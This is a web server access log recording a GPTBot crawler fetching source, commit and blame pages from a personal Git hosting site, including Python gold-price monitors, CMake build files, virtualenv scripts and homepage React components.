"/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=open" [Client 74.7.227.38] [Length 8475] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?state=closed" -[17/Feb/2026:16:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9899] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:16:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:16:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 15960] [Gzip 8.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:16:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 15994] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:16:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:16:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:16:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12501] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12529] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py?display=source" [Client 74.7.227.38] [Length 16798] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12529] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14252] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" -[17/Feb/2026:16:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16516] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15591] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13974] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" -[17/Feb/2026:16:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14862] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs?display=source" [Client 74.7.227.38] [Length 17935] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:16:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9924] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcmake_install.cmake" [Client 74.7.227.38] [Length 27489] [Gzip 5.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcmake_install.cmake" [Client 74.7.227.38] [Length 25029] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fcmake.check_cache" [Client 74.7.227.38] [Length 24694] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fprogress.marks" [Client 74.7.227.38] [Length 22628] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fMakefile.cmake" [Client 74.7.227.38] [Length 26458] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:16:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11553] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:16:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12169] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:16:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:16:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11564] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:16:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13532] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:16:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:16:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:16:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11562] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10469] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11561] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10468] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11561] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11559] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr 